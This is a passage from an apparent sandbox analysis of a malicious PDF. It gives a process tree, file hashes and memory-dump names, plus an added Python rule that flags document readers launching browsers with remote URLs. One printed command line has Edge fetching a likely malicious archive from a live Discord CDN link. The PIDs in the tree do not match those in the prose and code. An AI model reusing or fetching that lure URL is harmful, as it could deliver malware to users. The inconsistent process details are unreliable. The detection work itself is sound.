            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6604 /prefetch:2
            - Suspicious behavior: EnumeratesProcesses

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1920)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1816 /prefetch:8

    [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 220)
        cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/958958106811977752/961145090439512094/tt-copy.rar

        [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2356)
            cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a11946f8,0x7ff8a1194708,0x7ff8a1194718

    [2] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (PID 1860)
        cmd: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" /PRODUCT:Reader /VERSION:19.0 /MODE:3
        - Suspicious use of SetWindowsHookEx

        [3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe (PID 4348)
            cmd: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"

[1] C:\Windows\System32\CompPkgSrv.exe (PID 4348)
    cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding

[1] C:\Windows\system32\svchost.exe (PID 5252)
    cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

[1] C:\Windows\system32\OpenWith.exe (PIDs 1588, 4604, 2440, 5208, 5088, 5504; six instances with the same command line)
    cmd: C:\Windows\system32\OpenWith.exe -Embedding
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
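The one edge in this tree that matters is AcroRd32.exe (PID 2152) starting msedge.exe (PID 4612) with `--single-argument https://cdn.discordapp.com/.../tt-copy.rar`; everything else is Reader's CEF helpers, Edge's own service processes (the quarantine.mojom.Quarantine and unzip.mojom.Unzipper utilities are consistent with a download being written) and Windows' OpenWith prompts. What follows is an added example, not code from the report or its vendor, of the detection logic a SOC would run over process-creation telemetry to catch that edge: any child of a document reader whose command line carries a remote URL. The EVENTS list is constructed from the report's process tree (PIDs, images and arguments as printed there, with the long Chromium flags trimmed); the ProcEvent field names are this example's own rather than a sandbox or EDR schema, and the parent PID of the root AcroRd32.exe is a placeholder the report does not give.

```python
"""Detection logic for the chain the report shows: a document reader
(AcroRd32.exe, PID 2152) spawning a browser whose command line carries a
remote URL, here Edge fetching tt-copy.rar from cdn.discordapp.com.

Added example; not code from the sandbox report or its vendor. EVENTS is
constructed from the report's process tree (PIDs, images and arguments as
printed there, long Chromium flags trimmed); the ProcEvent field names are
this example's own, not a sandbox or EDR schema, and the parent PID of the
root AcroRd32.exe (1000) is a placeholder the report does not give.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


ACRO = r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
RDRCEF = r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
ARM = r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

# Constructed from the report's process tree; ppid 1000 for the root is a placeholder.
EVENTS = [
    ProcEvent(2152, 1000, ACRO, f'"{ACRO}" "C:\\Users\\Admin\\AppData\\Local\\Temp\\TT copy (3).pdf"'),
    ProcEvent(4268, 2152, RDRCEF, f'"{RDRCEF}" --backgroundcolor=16514043'),
    ProcEvent(32, 4268, RDRCEF, f'"{RDRCEF}" --type=gpu-process --use-gl=swiftshader-webgl'),
    ProcEvent(4612, 2152, EDGE, f'"{EDGE}" --single-argument https://cdn.discordapp.com/'
                                'attachments/958958106811977752/961145090439512094/tt-copy.rar'),
    ProcEvent(4648, 4612, EDGE, f'"{EDGE}" --type=crashpad-handler /prefetch:7'),
    ProcEvent(1860, 2152, ARM, f'"{ARM}" /PRODUCT:Reader /VERSION:19.0 /MODE:3'),
]

# Image names whose children should not normally be handed a remote URL to open.
DOCUMENT_READERS = {"acrord32.exe", "acrobat.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"(?i)\b(?:https?|ftp|file)://[^\s\"']+")
PAYLOAD_EXT = (".rar", ".zip", ".7z", ".iso", ".img", ".lnk", ".exe", ".msi", ".js", ".vbs")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def document_arg(cmdline: str):
    """The opened document: last quoted argument after the executable itself."""
    args = re.findall(r'"([^"]+)"', cmdline)
    return args[-1] if len(args) > 1 else None


def reader_url_launches(events):
    """One alert per URL found on the command line of a document reader's child."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in DOCUMENT_READERS:
            continue
        for url in URL_RE.findall(e.cmdline):
            p = urlparse(url)
            alerts.append({
                "reader": basename(parent.image), "reader_pid": parent.pid,
                "document": document_arg(parent.cmdline),
                "child": basename(e.image), "child_pid": e.pid,
                "url": url, "host": p.hostname,
                "payload_like": p.path.lower().endswith(PAYLOAD_EXT),
            })
    return alerts


if __name__ == "__main__":
    for alert in reader_url_launches(EVENTS):
        print(alert)
```

Reader legitimately launches the default browser whenever a user follows a link, so the rule is a triage signal rather than a block-on-sight detection: the `host` and `payload_like` fields are what an analyst (or an allowlist of corporate hosts) uses to separate a user clicking a normal link from a lure that pushes an archive off a file-hosting CDN.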
Network
MITRE ATT&CK Enterprise v6
Downloads
The archive the Edge command line points at (tt-copy.rar) is not among the files listed here; only Edge's own crashpad settings and Windows' CryptnetUrlCache entries (certificate/CRL fetches) were captured.

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
  Filesize: 471B
  MD5: 040801c3c7a1d7fcaf375e86ec6d66d8
  SHA1: df817e1fafaa8f1f24a0cfdb566811cc38c12b15
  SHA256: f13ad12d1c4a317f523bdcdfd8799058defe754e50aeda2bfd8bf7cb686d0d8a
  SHA512: 9f3dc51899fbecece4041c54b0ff88d5f03f161645e881080c3f81cbd8fff07ccd2294396cf0cf402a4c17c3ec347abd1a42d92bcbea8bfa19e267e8d4750631

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6
  Filesize: 434B
  MD5: e0da35c19d5d16bc756a821c114b2661
  SHA1: 06de7beaf90d8baa2a9a48e69f4d6110070b21dd
  SHA256: b4831f5a4150ced8a46c5f65cf543eba41cb4864f9eefd1f55c7436a97e84be8
  SHA512: 1537a20284b8a58d5ba449ebe4c086f1d5aecef1c4b7456ec8edeb936f39598693bb55306e86addeaa242df54391b893494e30d603dcc6936bfe973730e27595

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 7c709b14135a1c77814a526a2b460a97
  SHA1: 547bd68514a32a612c7c98e5324a35ea5b39d7a2
  SHA256: ef9d2108ad41aa1480db4b633bcf66c964b5d8d8aab6f3372143242affd948d4
  SHA512: baeb04f10ec0383f15ed5cfdf3242b69cbe3f166872012e5b85e83ca95e276623f62a923accc615394fd4058abe61809645f2cdaa0fafee099962a04541021c4

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 99e5dfeaf31981eb1b05a78f7ebf588c
  SHA1: d325e91325d838df555b7546059cafe1251c6ae1
  SHA256: 4a42d1322fc968609a912cc94bcc07b715e3d954d89942db47d4832b0d6a8e0a
  SHA512: f8d20de3b3a788545f9ebb41e90c5985d6f537996b09497606ea674f0b111d094b9956851826be2606c5cd4fc364fff0aeb7d4361e58c4e8717245ddc8749707

- \??\pipe\LOCAL\crashpad_4612_DMUARKFPPEQNORGK
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These four digests are the well-known hashes of empty input: the named pipe yielded zero bytes, so there is nothing here to hunt on.
Memory dumps
- memory/32-129-0x0000000000000000-mapping.dmp
- memory/208-132-0x0000000000000000-mapping.dmp
- memory/220-164-0x0000000000000000-mapping.dmp
- memory/1140-145-0x0000000000000000-mapping.dmp
- memory/1420-195-0x0000000000000000-mapping.dmp
- memory/1604-189-0x0000000000000000-mapping.dmp
- memory/1772-159-0x0000000000000000-mapping.dmp
- memory/1852-151-0x0000000000000000-mapping.dmp
- memory/1852-153-0x00007FF8BD340000-0x00007FF8BD341000-memory.dmp (Filesize: 4KB)
- memory/1860-171-0x0000000000000000-mapping.dmp
- memory/1920-200-0x0000000000000000-mapping.dmp
- memory/2184-180-0x0000000000000000-mapping.dmp
- memory/2356-165-0x0000000000000000-mapping.dmp
- memory/3112-125-0x0000000000000000-mapping.dmp
- memory/3140-137-0x0000000000000000-mapping.dmp
- memory/3148-192-0x0000000000000000-mapping.dmp
- memory/3152-173-0x0000000000000000-mapping.dmp
- memory/3236-168-0x0000000000000000-mapping.dmp
- memory/3540-142-0x0000000000000000-mapping.dmp
- memory/3576-152-0x0000000000000000-mapping.dmp
- memory/3688-155-0x0000000000000000-mapping.dmp
- memory/4156-183-0x0000000000000000-mapping.dmp
- memory/4268-124-0x0000000000000000-mapping.dmp
- memory/4344-162-0x0000000000000000-mapping.dmp
- memory/4348-178-0x0000000000000000-mapping.dmp
- memory/4612-126-0x0000000000000000-mapping.dmp
- memory/4620-176-0x0000000000000000-mapping.dmp
- memory/4648-127-0x0000000000000000-mapping.dmp
- memory/4672-191-0x0000000000000000-mapping.dmp
- memory/4824-186-0x0000000000000000-mapping.dmp
- memory/4908-148-0x0000000000000000-mapping.dmp
- memory/5176-196-0x0000000000000000-mapping.dmp
- memory/5412-197-0x0000000000000000-mapping.dmp
- memory/5528-198-0x0000000000000000-mapping.dmp